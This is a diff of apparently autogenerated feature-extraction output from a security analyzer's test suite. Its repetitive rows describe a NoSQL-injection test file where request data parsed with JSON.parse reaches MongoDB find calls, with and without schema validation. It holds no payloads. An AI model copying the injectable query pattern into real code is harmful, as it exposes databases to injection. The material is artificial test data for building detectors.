autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:22:15 | MongoClient | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:22:15 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:22:15 | MongoClient | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:22:23 | MongoClient.connect | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:22:23 | MongoClient.connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:22:23 | MongoClient.connect | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:22:23 | MongoClient.connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:22:23 | MongoClient.connect | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:36:6 | MongoCl ... \\n }) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:36:6 | MongoCl ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:36:6 | MongoCl ... \\n }) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:36:6 | MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:36:6 | MongoCl ... \\n }) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:36:6 | exceptional return of MongoCl ... \\n }) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:36:6 | exceptional return of MongoCl ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:36:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:36:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:36:6 | exceptional return of MongoCl ... \\n }) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:17:22:23 | connect | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:17:22:23 | connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:17:22:23 | connect | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:17:22:23 | connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:17:22:23 | connect | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:25:22:56 | 'mongod ... 7/test' | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:25:22:56 | 'mongod ... 7/test' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:25:22:56 | 'mongod ... 7/test' | calleeImports | mongodb | @@ -656,6 +3775,36 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:25:22:56 | 'mongod ... 7/test' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:25:22:56 | 'mongod ... 7/test' | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:25:22:56 | 'mongod ... 7/test' | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | ajv | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | ajv | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | ajv | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | ajv | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | checkSchema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | checkSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | checkSchema | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | checkSchema | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | checkSchema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | req | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | req | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | schema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | schema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | schema | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | schema | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | schema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | validate | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | validate | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:22:58 | validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | 'arguments' object of anonymous function | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | (err, d ... K\\n } | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | (err, d ... K\\n } | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | (err, d ... K\\n } | calleeImports | mongodb | @@ -665,6 +3814,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | (err, d ... K\\n } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | (err, d ... K\\n } | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | (err, d ... K\\n } | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | exceptional return of anonymous function | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | exceptional return of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | exceptional return of anonymous function | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | return of anonymous function | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | return of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:59:36:5 | return of anonymous function | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:60:22:62 | err | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:60:22:62 | err | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:60:22:62 | err | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:60:22:62 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:60:22:62 | err | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:65:22:66 | db | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:65:22:66 | db | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:65:22:66 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:65:22:66 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:65:22:66 | db | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:65:22:66 | db | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:65:22:66 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:65:22:66 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:65:22:66 | db | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:65:22:66 | db | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:15 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:15 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:15 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:15 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:15 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:38 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:38 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:38 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:38 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:38 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:38 | doc = d ... ('doc') | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:38 | doc = d ... ('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:38 | doc = d ... ('doc') | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:38 | doc = d ... ('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:13:23:38 | doc = d ... ('doc') | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:20 | db | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:20 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:20 | db | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:20 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:20 | db | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:31 | db.collection | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:31 | db.collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:31 | db.collection | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:31 | db.collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:31 | db.collection | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:38 | db.collection('doc') | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:38 | db.collection('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:38 | db.collection('doc') | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:38 | db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:38 | db.collection('doc') | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:38 | exceptional return of db.collection('doc') | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:38 | exceptional return of db.collection('doc') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:38 | exceptional return of db.collection('doc') | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:38 | exceptional return of db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:19:23:38 | exceptional return of db.collection('doc') | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:22:23:31 | collection | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:22:23:31 | collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:22:23:31 | collection | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:22:23:31 | collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:22:23:31 | collection | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:33:23:37 | 'doc' | CalleeFlexibleAccessPath | db.collection | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:33:23:37 | 'doc' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:33:23:37 | 'doc' | contextFunctionInterfaces | validate(x) | @@ -673,11 +3887,56 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:33:23:37 | 'doc' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:33:23:37 | 'doc' | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:23:33:23:37 | 'doc' | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:19 | query | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:19 | query | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:19 | query | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:19 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:19 | query | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:48 | query | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:48 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:48 | query | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:48 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:48 | query | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:48 | query = ... y.data) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:48 | query = ... y.data) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:48 | query = ... y.data) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:48 | query = ... y.data) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:15:25:48 | query = ... y.data) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:26 | JSON | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:26 | JSON | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:26 | JSON | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:26 | JSON | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:26 | JSON | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:32 | JSON.parse | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:32 | JSON.parse | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:32 | JSON.parse | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:32 | JSON.parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:32 | JSON.parse | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:48 | JSON.pa ... y.data) | contextFunctionInterfaces | validate(x) | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:48 | JSON.pa ... y.data) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:48 | JSON.pa ... y.data) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:48 | JSON.pa ... y.data) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:48 | JSON.pa ... y.data) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:48 | exceptional return of JSON.pa ... y.data) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:48 | exceptional return of JSON.pa ... y.data) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:48 | exceptional return of JSON.pa ... y.data) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:48 | exceptional return of JSON.pa ... y.data) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:23:25:48 | exceptional return of JSON.pa ... y.data) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:28:25:32 | parse | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:28:25:32 | parse | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:28:25:32 | parse | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:28:25:32 | parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:28:25:32 | parse | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:36 | req | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:36 | req | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:36 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:36 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:36 | req | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:42 | req.query | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:42 | req.query | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| 